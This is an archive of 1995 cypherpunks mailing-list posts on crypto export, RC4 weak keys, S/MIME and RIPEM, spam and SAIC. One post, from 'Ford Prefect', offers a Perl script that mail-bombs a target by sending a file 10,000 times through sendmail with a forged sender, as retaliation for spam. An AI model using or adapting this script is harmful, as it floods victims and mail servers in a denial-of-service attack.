go down kicking and screaming, realizing that the delicious lunch they
were salivating after was actually sinking in a tar pit.



Boardwatch
Webwatch column
by editor Jack Rickard

The World Wide Web has deservedly captured the imagination of the online
world. It displays both extraordinary connectivity, in that you can
literally hop across continents by clicking the mouse, and a very
visually appealing  graphical interface. And it probably goes
beyond that with the use of audio, videoclips, and more. But it is
destined to die in its current form.

Through the entire history of the online community, there has
been an urge to create pretty screens, have them blessed by lawyers,
and presented online for the consumption of the masses, who in theory
will each pay a little bit of coin of the realm for the privilege.
Literally hundreds of millions of dollars drained into
this rathole fantasy before those who created online
services began observing what people *wanted* to do online. Visually 
appealing screens are alway a novelty. But after the novelty wears
off, the callers move on. Knight-Ridder provided the most grisly 
example of this with their failed VIEWTRON service. But they
weren't alone.

Currently the World Wide Web is in a nearly pure fad phase entirely 
based on novelty. Amost every site you visit has something new and
stunning to offer by way of screen design tricks. But after clicking
through the thousands of sites available for a few weeks, almost
everyone tires of the game and starts looking for a home. Since most
of what the web can do is present information via eye-candy screens, they 
rarely find one. So they are back to newsgroups and e-mail to keep them
occupied.

This is not entirely apparent today. The flood of new callers just gaining 
access is  immense. And according to an NTIA study just released, by the
end of 1995, nearly half of the population online will have just
arrived in 1995. But at some point, webulosis, a hardening of the
web, could set in.

We don't actually think it will happen. There is enough in the combination
of novelty and new blood to keep this in the air for some months.
And that may be all that is needed. But for the web to grow beyond
pretty screens, bulletin boards or something very like bulletin boards 
must migrate to the Web and make it truly useful. In other words, web
sites must evolve into "places" where there are "people" if they
are to continue to be relevent beyond specialty publishing. 

So our theory is that the Web is going to change into a series of bulletin
boards. And bulletin boards, conversely, are going to migrate to the
web with all the caller management, local message conferences, and sense of
"place" that entails.

...

[the article goes on to mention the Whole Earth 'Lectronic Link as a
living embodiment of this trend, see http://www.well.com]

--Vlad Nuri






From cman at communities.com  Fri Sep 29 16:46:37 1995
From: cman at communities.com (Douglas Barnes)
Date: Fri, 29 Sep 95 16:46:37 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: 



>The reason the market for this is weird is the same reason Sun took
>the DES chips off its motherboards years ago -- you can't conduct
>modern business with the fucked up export regime we are dealing with.
>

Also, even if national boundaries could be transcended (it's not just
the US any more on this score), I'll grant to Tim that server-oriented
cryptography h/w isn't going to be a mass-market item. It's going to
be a niche market, but it's an _absolutely vital_ niche market if this
stuff is going to take off in a big way. I, too, wouldn't invest big
bucks in a company that did nothing but server-oriented crypto h/w,
but I know that a lot of very good business ideas _won't work at all_
if this stuff doesn't exist.

At the same time, there is going to be a very good business in
consumer-oriented crypto devices as the problems inherent in using
a general purpose computer for storing & processing keys, e-cash,
etc. become apparent. I'm leaning away from the less specialized stuff,
e.g. "checkbook on a PCMCIA card" and toward general purpose cards
like the nat. semi. and telequip stuff. Both of these companies are
rumored to be offering server-oriented products in the next couple of
quarters to compliment their consumer product lines.

The problem with general purpose machines has nothing to do with
native processing vs. DSPs, but rather the fact that g.p. machines
have mechanical hard drives and don't fit in your pocket. They also
tend to house a lot of dubious other software that could get its
grubby hands on things. These issues of reliability, portability
and security don't affect things like soundcards, which is why
native signal processing is likely to win there, but not in the
use of crypto to secure valuable transactions.








From yusuf921 at uidaho.edu  Fri Sep 29 16:55:06 1995
From: yusuf921 at uidaho.edu (Syed Yusuf)
Date: Fri, 29 Sep 95 16:55:06 PDT
Subject: Electronic junk mail
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID: 




I just recieved an electronic junkmail! 
not only that but it was racist (and/or republican) in content.

:
> 
> Syed Yusuf wrote...
>    
>>   how did this get into my mailbox and is there anything I can do to 
>>keep stuff like this out?
>
> apparently someone sent this message to a lot of people -- others have
> reported getting it too.
>
> there is _nothing_ you can do to keep unwanted mail out of your mailbox,
          ^^^^^^^^^!!!!
Nothing? NOTHING??????

Cypher punks to the rescue? my privacy has been violated anyone got any 
ideas besides just putting each individual into my kill file?


--
Syed Yusuf  |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran






From baldwin at RSA.COM  Fri Sep 29 18:19:08 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Fri, 29 Sep 95 18:19:08 PDT
Subject: RSA's comments on RC4 weak keys
Message-ID: <9508298124.AA812423895@snail.rsa.com>


        Well, I seem to be falling into the role of spokesperson
for RSA on the net.  It gives me something to do other than
design reviews and programming.  Here is our response to the 
excellent work that Andrew Roos has been doing on RC4.  I am
glad that people are looking at RC4 critically.
                --Bob


-----------------------------
September 29, 1995 statement from RSADSI


RSA Data Security Inc. has been following the emerging
reports of a weakness in certain keys for the RC4 cipher.
RSADSI's researchers have been aware of this particular
property of the RC4 cipher for over a year.   Most ciphers
have a property whereby an enormous amount of known
plaintext will provide a slight reduction in exhaustive key
searching.  The linear cryptanalysis of the DES cipher is an
well known example of this.   Limitations like this in the
underlying ciphers are addressed by following sound advice
on the design of the overall cryptographic system.

Products that include RC4 from RSADSI are not compromised by
this attack.  Companies that license the BSafe cryptography
toolkit have always been given advice that overcomes this
limitation of the RC4 cipher, and this is true even for
products that were built >before< this specific problem was
discovered by the researchers at RSADSI.   These researchers
also monitor all developments in the field of cryptography
and cryptanalysis so they can keep RSADSI's customers
appraised relevant developments.






From remailer at bi-node.zerberus.de  Fri Sep 29 18:34:21 1995
From: remailer at bi-node.zerberus.de (Ford Prefect)
Date: Fri, 29 Sep 95 18:34:21 PDT
Subject: Electronic junk mail (one solution)
Message-ID: 


OK...I know this borders on a "denial of service" attack since it may 
effect innocent users. How would you like to be the one to explain to  
your System Administrator that the Megabytes of returned Spam on the 
disk are yours? 
I realize that some peoples implementations of Sendmail will tell who
your are regardless, so you might have to modify the "system" line for
your own tastes. Also you might *not* want to be anon. Please feel
free to modify to your own tastes. The delay loop is to space out 
the load. I also tried it with premail instead of Sendmail and it
went thru the remailers just fine. It should be capable of running 
in the background. Only took 5 minutes to write and a couple of 
remailers to test.
============================================================
#!/usr/bin/perl
print "Who does this go to?: ";
chop($name = );
print "What is the filename to send?: ";
chop($filename = );
for ($a=0;$a<100;$a++) {
for ($b=0;$b<100;$b++) {
system ("/usr/lib/sendmail -f nobody $name < $filename");
for ($x=0;$x<600000;$x++){};
}
}
============================================================





From tcmay at got.net  Fri Sep 29 19:06:45 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 29 Sep 95 19:06:45 PDT
Subject: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: 


At 5:12 PM 9/29/95, Peter Trei wrote:
>------- Forwarded Message Follows -------

>Date: 20 Sep 1995 12:24:10 GMT
>From: rja14 at cl.cam.ac.uk (Ross Anderson)
>Subject: European Governments Agree to Ban Strong Crypto
...

The biggest problem I have with this is that this is the third, fourth, or
fifth posting of Ross Anderson's piece to this list (maybe I'm counting one
or more posts to Cyberia-l). (And others commented on the "Europeans to ban
strong crypto" theme about a week ago.)

I urge people to read what's on the list and not repost things which have
already appeared. If they don't have time to read all of the messages on
the list, which is understandable, then they need to be even more careful
in posting things.

Not to pick on Peter Trei, as this happens all the time, whenever a hot
issue appears.

With 1000 people on the list, repeated postings and cross-posting spams are
getting out of hand.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From anonymous at freezone.remailer  Fri Sep 29 19:12:51 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 29 Sep 95 19:12:51 PDT
Subject: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509300212.WAA29555@light.lightlink.com>


URL: http://www.saic.com/corporate/history/25.html


    *** About SAIC ***
     
_________________________________________________________________


   
                          "SAIC 25 YEARS OF PROGRESS"
                                       
   Founded by a small group of San Diego scientists in 1969, 
Science
   Applications International Corporation (SAIC) now ranks as 
the
   nation's largest employee-owned high-tech company. With 
annual
   revenues of $1.6 billion, SAIC has almost 4,000 employees in 
San
   Diego, and about 16,000 employees at more than 250 locations
   worldwide.
   
    SAIC offers broad expertise in technology development and 
analysis,
   computer system development and integration, technical 
support
   services, and computer hardware and software products. SAIC 
scientists
   and engineers work to solve complex technical problems in 
business
   areas that include environment, energy, health, 
transportation and
   space.
   
    Since the beginning, SAIC has been committed to making 
significant
   contributions to nationally important programs. Over the 
past two
   decades, SAIC technical staff have contributed to clean-up 
efforts at
   Three Mile Island and Prince William Sound, to the success 
of
   Operation Desert Storm, and to space missions ranging from 
Voyager to
   the shuttle flights. The company is helping develop new 
technology to
   clean up hazardous waste at Superfund sites, while other 
scientists
   are studying global climate and oceanographic changes. In 
another
   critical area, SAIC is increasing the quality of patient 
care while
   lowering costs by developing an automated patient record 
system for
   Department of Defense medical facilities.
   
    Today, SAIC generates about 90 percent of its business 
through
   federal government contracts, half of which are in the 
national
   security area. The company has been transitioning its 
extensive
   experience in advanced defense systems and software 
engineering to
   benefit civilian programs. For example, SAIC networking 
capability
   helps dozens of government agencies share information to 
fight drug
   smuggling, and integrates technology that has put a 
pollution-free bus
   on the road.
   
    Bob Beyster, SAIC's founder and chief executive officer, 
credits the
   success of the company to its employee ownership.
   
    "The hallmark of SAIC through the years has been the 
principle that
   those who contribute to the company should own it, with that 
ownership
   proportional to their contribution and performance as much 
as
   possible," Beyster says, "SAIC was designed for professional 
people
   who want to do superior scientific and technical work, who 
want to
   have a stake and a voice in the company's development and 
direction,
   and who expect fair rewards for doing excellent work."
   
_________________________________________________________________

   
   Copyright SAIC Home
_________________________________________________________________

 
    Last updated on 07-05-95

----------


URL: http://www.itps.saic.com/websites.htm


Other SAIC Web Sites:

    
_________________________________________________________________

   
   Foundation for Enterprise Development
   
   SAIC Advanced Technology and Analysis Sector
   
   SAIC Aeronautical Systems Operation
   
   SAIC Applied Physics Operation
   
   SAIC ASDI (SEE Program)
   
   SAIC Asset C3I Group
   
   SAIC Hampton's Information System
   
   SAIC HTTP Server Site
   
   SAIC Idaho Falls ID
   
   SAIC Ideas Group
   
   SAIC Information and Simulation Sciences
   
   SAIC Information Technology Group
   
   SAIC Information Technology Lab
   
   SAIC JSTARS MOT&E Office
   
   SAIC @ Langley Research Center
   
   SAIC Los Altos
   
   SAIC Medical Imaging
   
   SAIC @ New Mexico
   
   SAIC Open Systems Lab
   
   SAIC Security Web Site
   
   SAIC Space Sciences
   
   SAIC Sterling Heights, Michigan
   
   SAIC System Development Operation Center
   
   SAIC Systems Engineering
   
   SAIC Technology Solution Sector
   
   SAIC Telecommunications Information Engineering Organization
   
   SAIC Test and Evaluation Group
   
   SAICnet Gopher
   
     
_________________________________________________________________

   
   SAIC-Hosted/Created Sites:
   
   Smart Site
   
   City of Ridgecrest Homepage







From dan at milliways.org  Fri Sep 29 19:15:12 1995
From: dan at milliways.org (Dan Bailey)
Date: Fri, 29 Sep 95 19:15:12 PDT
Subject: ESM under ULTRIX?
Message-ID: <199509300215.AA06751@ibm.net>



I'm having some trouble getting ESM to work under DEC Ultrix.  Has
anyone gotten this to work?  My first problem was that Ultrix doesn't
understand one of the constants passed to an ioctl.  With the help of
a Linux box, I got the value of the constant and plugged it in.  
	Now ESM compiles, says randomizing........, then does a carriage
return and just dies.  Ctrl-C doesn't work, Ctrl-Z doesn't work. 
Further I know that it's dying somewhere before the ioctl.  Anyone one
know how to make this work?  For reference,
> uname -a                      
ULTRIX bigwpi.WPI.EDU 4.5 0 RISC
>                               

						Dan

***************************************************************
#define private public						dan at milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************






From anonymous at freezone.remailer  Fri Sep 29 19:22:04 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 29 Sep 95 19:22:04 PDT
Subject: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509300221.WAA00326@light.lightlink.com>


URL: http://opentext.uunet.ca:8080/omw/simplesearch
  
   
   The Open Text Index found 199 pages containing: Science
   Applications International Corporation.







From jervin at netpath.net  Fri Sep 29 20:13:48 1995
From: jervin at netpath.net (John D. Ervin)
Date: Fri, 29 Sep 95 20:13:48 PDT
Subject: Export/import of chips
Message-ID: <199509300315.XAA01062@server1.netpath.net>


I deal with Importers from Taiwen, Hong kong, Korea, and China on a daily
basis. 

Because the deals I get on components is very good...

They are name brand and meet FCC Standards when assembled as systems, but when 
imported as components they are generally worthless, until assembled

How is import or export of Encryption related components monitored ??

Microprocessors can be imported and exported, as can boards..
As Junk....

Nobody Checks these shipments ??

Now if some of those boards did encryption/decryption, and they were paired
with a processor, They could do some damage..

But when imported and exported as components (ie Electronic Junk) who is to
tell what the end usage is really for ??

This is how a Toyota, Datsun, Subaru, etc are really American built and are
American Cars.....
-------------------------------------------------
jervin at netpath.net


-------------------------------------------------






From karlton at netscape.com  Fri Sep 29 21:07:23 1995
From: karlton at netscape.com (karlton)
Date: Fri, 29 Sep 95 21:07:23 PDT
Subject: Netscape hole without .Xauthority (fwd)
In-Reply-To: 
Message-ID: <306CC278.4AF@netscape.com>


If your X server is not secure, then your pass phrases
are not secure. If your pass phrases are not secure then
private keys are compromised. If your private keys are
compromised ...

She swallowed a fly! Perhaps, she'll die.

PK
--
Philip L. Karlton                       karlton at netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation





From karlton at netscape.com  Fri Sep 29 21:21:33 1995
From: karlton at netscape.com (karlton)
Date: Fri, 29 Sep 95 21:21:33 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <9508298123.AA812398949@cc2.dttus.com>
Message-ID: <306CC5CC.6A7E@netscape.com>


I will mail the relevant files to Mr. Diehl.

PK
--
Philip L. Karlton                       karlton at netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation





From adam at homeport.org  Fri Sep 29 21:40:21 1995
From: adam at homeport.org (Adam Shostack)
Date: Fri, 29 Sep 95 21:40:21 PDT
Subject: Hack Microsoft
In-Reply-To: <199509291635.JAA06820@infinity.c2.org>
Message-ID: <199509300443.AAA28911@homeport.org>


Perry writes:

> Thats almost an invitation to hack Microsoft's web products, isn't it?
> 
> (Anyone from Netscape care to join in the fun?)
> 
> Perry

	While this might been read as a sarcastic comment, I'll
suggest that it really is excellent advice from Perry.  Like
cryptosystem design, secure software is best written by those with
experience breaking other people's system.

	Encouraging Netscape programmers to hack at SST will result in
embarassing disclosures for Microsoft, and better code for Netscape.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From anonymous-remailer at shell.portal.com  Fri Sep 29 21:43:26 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 29 Sep 95 21:43:26 PDT
Subject: Murdering Electronic junk mailers *should* be legal. Nuking thei
Message-ID: <199509300442.VAA28026@jobe.shell.portal.com>


On 29 Sep 95 at 16:54, Syed Yusuf wrote:


> I just recieved an electronic junkmail! 
> not only that but it was racist (and/or republican) in content.
 
!!
> Nothing? NOTHING??????
 
> Cypher punks to the rescue? my privacy has been violated anyone got
> any ideas besides just putting each individual into my kill file?

The return address was forged, I emailed the header chain's 
first smtp server admin to see if they can help. 

If I find the guy, he provider will nuke him or they are toast. 
Period!

> --
> Syed Yusuf  |   http://www.uidaho.edu/~yusuf921
> Keep me away from Wisdom that does not Cry, Philosophy that does not
> Laugh, and Greatness that does not bow before Children
>                                                  --Kalil Gibran
> 
> 





From ChristopherA at consensus.com  Fri Sep 29 22:26:13 1995
From: ChristopherA at consensus.com (Christopher Allen)
Date: Fri, 29 Sep 95 22:26:13 PDT
Subject: X.509, S/MIME, and evolution of PGP
Message-ID: 


At 3:22 PM 9/27/95, Bill Stewart wrote:
>2) RSA patent - can this be built with RSAREF?  Or RSAREF with permission
>for a couple extra activities?  Or built out of RIPEM or RIPEM-SIG?
>The latter has the benefit of already being exportable.

It certainly can be built from RSAREF, as I use my Apple DigiSign X.509 key
(ultimately created with TIPEM in the Mac system software) with RIPEM/Mac
(which uses RSAREF.)

Some additional info: my company, Consensus Development, has commercial
rights to license developers RSAREF also has a good relationship with
VeriSign. We helping them writea variety of tools to make issuing X.509
certs easier.

>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>publicly available algorithms, though this is really just an X.509 handler.

I've been working on getting RC2/RC4 in object-only exportable size key
form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
We have to work out details, however.

>6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
>related code in SSLeay to steal to help implement it?

I spoke with Eric yesterday and I think he was working on some ASN.1
related classes for a future version of SSLeay.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..             o510/559-1500  f510/559-1505..







From moose at cm.org  Fri Sep 29 23:41:46 1995
From: moose at cm.org (Cancelmoose[tm])
Date: Fri, 29 Sep 95 23:41:46 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <199509162353.RAA06965@nagina.cs.colorado.edu>
Message-ID: <19950930064113.AXK11529@cm.org>


> 
> Several people are working on improvements to netnews which allow more active
> filtering.  The most promising techniques that I have heard about involve a
> lot of "ratings" being generated by readers and then taken into account by
> other readers when filtering/sorting the articles.
<
> I don't know if the technology is there yet, or if it is accessible to most
> of our readers.  One person who is working on such a scheme is "(cm)", or 
> "na48985 at anon.penet.fi".  I have added his name to the Cc: line so perhaps he
> would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.


(Please note the new email address-- moose at cm.org).

I apologize for the delay in responding to your message -- I will be
putting a lot of information about NoCeM up on http://www.cm.org in
the next day or so.  You can also find information in the newsgroup
alt.nocem.misc (if you get it).

If these don't work for you, feel free to write to me, and I'd be
happy to send you whatever you need.

(cm)

=-=-=-=-=
Please note new address: moose at cm.org




From jirib at sweeney.cs.monash.edu.au  Fri Sep 29 23:44:19 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Fri, 29 Sep 95 23:44:19 PDT
Subject: Electronic junk mail
In-Reply-To: 
Message-ID: <199509300642.QAA28042@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello Syed Yusuf 
  and cypherpunks at toad.com

S.Y. wrote:
> I just recieved an electronic junkmail! 
...
> :
...
> > there is _nothing_ you can do to keep unwanted mail out of your mailbox,
>           ^^^^^^^^^!!!!
> Nothing? NOTHING??????
...

You could only accept signed e-mail. From a suitably defined set of
signators, of course.

If you write a script to do that for you, it would be useful to
others as well: parents could set it up for their innocent children
to guard them against all them bad guys on the net of which there
are exactly 98.3527% (no, that's not from [Rimm 95], I made it up).

The other thing would be that you would thereby force all your
correspondents to use PGP, which can't be such a bad thing, can it.


Yes, no, maybe?

Jiri
- --
If you want an answer, please mail to .
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzmoSxV6mvvBgf5AQFRXQQAzP2Zv6reuIVyq9TdofXq5wJCz5aLdXou
yexGtkXSo8HKcHEmtF1DpcTZuzNs0zuXD92G3VAI+nCncAzfKKsLziSZ5hd93Dnm
huTC+wLm6XrnrjwS56h8F843bBE2jrEL1rnBN9UhEUD9VOyA1ncj7rb8Nap9Z0/V
885XUrREQTM=
=pOSV
-----END PGP SIGNATURE-----




From jamesd at echeque.com  Fri Sep 29 23:58:27 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 29 Sep 95 23:58:27 PDT
Subject: 
Message-ID: <199509300658.XAA03050@blob.best.net>


In addition to being totally off topic and spamming lots of lists, 
Terra Libra is selling Ponzi schemes and pyramid schemes.

This is just "make money fast" elaborately dressed in libertarian
rhetoric.


At 07:11 AM 9/28/95 +0100, Anonymous wrote:
>   This is the best description of debt currency I've seen. Debt currency
>is today's most effective form of slavery. It is today's American slavery.
>
>                The text is from the book:
>
>               THE ECONOMIC RAPE OF AMERICA
>                 WHAT YOU CAN DO ABOUT IT
>
>by Frederick Mann of Terra Libra
>
>The book costs $19.95 plus $2 postage and handling.
>It can be ordered from:
>
>Terra Libra
>2430 E. Roosevelt #998
>Phoenix, Az 85008
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jirib at sweeney.cs.monash.edu.au  Sat Sep 30 00:27:15 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sat, 30 Sep 95 00:27:15 PDT
Subject: Cypherpunks Press release
In-Reply-To: 
Message-ID: <199509300726.RAA28172@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks at toad.com
  and tcmay at got.net (Timothy C. May)

tcmay at got.net (Timothy C. May) wrote:

> I guess you all know how much I hate this "who will be our spokesman?"
...

It seems to me that there are two viewpoints, 
  * a spokesman would be useful, and
  * a spokesman cannot be appointed due to lack of org

Which both seem to be true to me (they are *not* contradictory, only
the consequences are).


How about this idea: I remember once seeing some piece on some TV
personality (sorry, don't remember who, long time ago) who was
interviewed by fax. The jounalist sent questions to him, and some
time later received answers.

All that is needed then is someone with a fax machine to volunteer
to receive the fax, type it in and summarise the response afterwards
(noting points on which there was disagreement, and who disagreed
in what way).

...
> I've turned down several recent chances for interviews, for these reasons:
> 
> 1. I feel the people doing the work should be interviewed, not just someone
> who has some visibility (whatever mine might be). If PGP is the issue, then
...

Except PGP skill doesn't equal PR skill, not to mention that there
might be a geographical, time-zone or language barrier.

Sometimes having a separate PR person is useful, even if it does
tend to lead to the moronic statements salesdroids are infamous for.
With care, this problem can be minimized.

...
> 2. Location, location, location! The media foci are Washington, New York,
> and San Francisco, at least for our area of interest. Occasional forays
> into Austin, Miami, L.A., etc. This is where the taped interviews are done.
...

Not all PGP is done in those areas. You might want to have a SpokesPunk
near a focus to avoid having to get the people who actually do the work
to one of the abovementioned foci.

...
> The point? These "journalists" are tuned to looking for catchy quotes, all
...

It's in our interest to give them such catchy quotes, no?
Unless it would destroy us, of course...

...
> With no organization, no office, no coordination, we cannot "feed the media
> machine" the way it expects to be fed.

Only problem is, does anyone know of any other way to get our
ideas to be accepted by Joe Sixpack?

...
> Far better that journalists like Steven Levy and John Markoff subsribe to
> the list, or to condensations by people like Eric Blossom, and then deal
...

But then wouldn't that journalist act as a SpokesPunk?

Would you support such a jounalist writing about Cypherpunks?

What is the essential difference between a jounalist writing an
article and a volunteer writing a press release?

> Anarchy is part of our charm. More importantly, part of our theme.
...

A well-written press release could reflect that.

For example, some points could be presented in two ways (perhaps
even contradictory) with full attribution of who wrote which view.

Those who oppose the whole idea could be noted in the press release :-)
Unless they object to that in which case they wouldn't be.


Yes, No, Maybe? Definite Maybe?

Jiri
- --
If you want an answer, please mail to .
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzxJCxV6mvvBgf5AQF1owP9GwgbLK1/HCq+iRKqw42q5Y6Kzbtmyda1
YJwblubOWacbVER2aURAN3m51MCsTXreuLxSbcm9dgP4Zk2071yZFGa7D2OF7dtS
pkfa5k1pn2v1EYplTvgJhAdTVJGqJ3sPc1VCIIWaRazeJjS0zA4d9rHmJWXb5DXp
6Hz8CbDw4UA=
=th3o
-----END PGP SIGNATURE-----




From stewarts at ix.netcom.com  Sat Sep 30 01:28:33 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 30 Sep 95 01:28:33 PDT
Subject: X.509, S/MIME, and evolution of PGP
Message-ID: <199509300828.BAA00347@ix.ix.netcom.com>


At 10:29 PM 9/29/95 -0700, Christopher Allen  wrote:
>At 3:22 PM 9/27/95, Bill Stewart wrote:
>>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>>publicly available algorithms, though this is really just an X.509 handler.
>I've been working on getting RC2/RC4 in object-only exportable size key
>form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
>We have to work out details, however.

Sounds good, but having publicly implementable standards would be nicer;
licensable patented code is enough of a hassle, without having standards
that have *trade secrets* built into them.  RC2 as an option is fine;
RC2 as a mandatory part of a conforming implementation is pretty tacky.

>>6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
>>related code in SSLeay to steal to help implement it?

Actually, it turns out that the latest RIPEM has certificate chains, Web of
Trust,
and really just about everything I want, except perhaps user-friendly GUIs,
which could be added easily enough.  I haven't yet sorted out which
parts are in the export-approved RIPEM-SIG and which parts are only in RIPEM2.1,
but it's a pretty straightforward job.  (Now to go scrounge some disk space!)
The RIPEM code is all public-domain, and uses RSAREF for its crypto,
so exporting the non-RSAREF parts is copyright/patent clean, and maybe
it can be possible to put together a CJ-able version of the new stuff
so it can gain legitimacy after having been exported for months :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From bdavis at dg.thepoint.net  Sat Sep 30 02:32:26 1995
From: bdavis at dg.thepoint.net (Brian Davis)
Date: Sat, 30 Sep 95 02:32:26 PDT
Subject: [revcoal@pcnet.com: Re: The owls are not what they seem]
In-Reply-To: <9509151740.AA06675@veronica.EBT.COM>
Message-ID: 


On Fri, 15 Sep 1995, David Taffs wrote:

> 
> fyi...
> 
> Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT)
> From: "Donna J. Logan" 
> ... 
> BTW, I'm being cagey in actually mentioning your service provider's name/
> initials, as we found that was one of the "keywords" in the filter program
> used by them and a certain national police agency (who's initials also 
> trigger the filter program) to flag posts which they thought may be 
> "interesting", resulting in delays of up to days in posting.  Same thing
> happened in live chat in PRIVATE chat rooms, we were able to bring the
> system to a complete halt by just typing the initials of Frederico's
> Bumbling Idiots....                                      ^^^^^^^^^^^
  ^^^^^^^^^^^^^^^
It may amuse you to know that some other federal law enforcement agencies 
refer to Fred's bunch as "Famous But Incompetent."

But then their TV show got canceled ....





From fc at all.net  Sat Sep 30 03:42:15 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Sat, 30 Sep 95 03:42:15 PDT
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
In-Reply-To: <199509291716.KAA06460@ix8.ix.netcom.com>
Message-ID: <9509301040.AA02608@all.net>


...
> >The attack is based on two particularly interesting three-byte key
> >prefixes which have a high probability of producing PRNG sequences
> >which start with a known two-byte sequence. The prefixes are:
> >1.  Keys starting with "00 00 FD" which have a 14% probability of
> >    generating sequences which start "00 00".
> >2.  Keys starting with "03 FD FC" which have a 5% probability of
> >    generating sequences which start "FF 03".
> [much interesting work deleted]
> 
> It sounds like any application using RC4 with random session keys
> should start by testing session keys and rejecting any that
> start with 00 00 or 03 FD; it means doing 2**-15 more random key
> generations, and reducing the brute-force space by 2**-15,
> but it's a pretty small reduction.

The problem is that if these keys are weak, there may be many others
that are also weak.  In fact, by the time we explore all of the
weaknesses, we may find the system is no longer very strong at all. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From anonymous at freezone.remailer  Sat Sep 30 04:04:19 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:04:19 PDT
Subject: RTR-3 Package/Bomb Inspection System
Message-ID: <199509301104.HAA21361@light.lightlink.com>


URL: http://www.saic.com/products/rtis/rtr3.html


   *** Products and Services ***
     
_________________________________________________________________

   
RTR-3

   
   [RTR-3 Package/Bomb Inspection System] (Click on the image 
to see a
   larger, 268 kb. photo.)
   
   Is a rugged one-man portable system for digital X-ray 
imaging in the
   field.
   
        The RTR-3 is a safe efficient tool for a wide range of 
Security
        applications.
        
   o It is ideal for: Small package inspection/bomb detection;
          Unexploded ordnance evaluation; Point-of-entry and 
Customs
          contraband detection; Nondestructive search and 
evaluation.
          
   o Quick and easy to set up, simple to operate with either 
battery or
          line voltage.
         
   o Lightweight (under 10 pounds), compact electronic imager 
with 8x10
          inch X-ray sensor. Images are displayed immediately 
after
          acquisition on the flat panel display.
          
   o Portable, lightweight (25 pounds with batteries) 
integrated
          control unit with 9.5-inch flat panel image display.
          
   o Single package portable X-ray source. Portable sources are 
used
          with either battery or line voltage.
          
   o RTR-3 images are archived digitally and can be transmitted 
by
          modem, or floppy disk, to other computers for more 
detailed
          evaluation, and /or to assemble a database.
          
          [RTR-3 Pipe bomb X-ray] (Click on the image to see a 
larger,
          156 kb. photo.)
          
          RTR-3 is a complete, one-man portable X-ray system 
capable of
          acquiring, enhancing, archiving, and transmitting 
radioscopic
          images in the field.
          
          The portable generator produces 20-25 very short 
bursts of
          X-rays in approximately one second during image 
acquisition
          resulting in very safe field operation.
          
          A familiar Microsoft Windows user interface permits 
efficient
          operation of the system and provides acess to many 
image
          enhancement capabilities of the digital image 
processor.
          
          The RTR-3 features contrast stretch, zoom, pan and 
scroll,
          sharpening, smoothing, storage to hard or floppy 
disk, and
          transmission of images by modem.
          
          The RTR-3 ships in two rugged light-weight containers 
for
          maximum field portability.
          
          Click here for SPEC sheet.
          
          For more information, comments, or questions, send 
email to
          John Reed (619) 458-3797 or to Nicholas Vagelatos 
(619)
          458-3769, Fax (619) 458-3718.
          
            
__________________________________________________________
          
